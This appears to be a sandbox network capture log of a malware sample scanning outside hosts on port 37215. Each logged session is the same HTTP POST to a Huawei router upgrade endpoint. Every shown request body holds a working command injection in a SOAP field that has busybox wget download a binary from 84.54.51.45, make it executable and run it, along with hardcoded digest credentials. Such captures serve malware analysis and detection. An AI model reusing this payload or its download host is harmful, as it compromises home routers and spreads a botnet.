                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1276192.168.2.1544226197.130.218.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729995012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1277192.168.2.1538966197.31.132.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729998112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1278192.168.2.1551180197.180.185.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730032921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1279192.168.2.1541482197.231.132.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730034113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1280192.168.2.1555400197.175.236.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730034113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1281192.168.2.1543006197.109.86.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730067015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1282192.168.2.1551688197.109.144.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730067015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1283192.168.2.1537296197.187.61.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730117083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1284192.168.2.1552926197.219.190.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730118990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1285192.168.2.1547380197.61.14.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730120897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 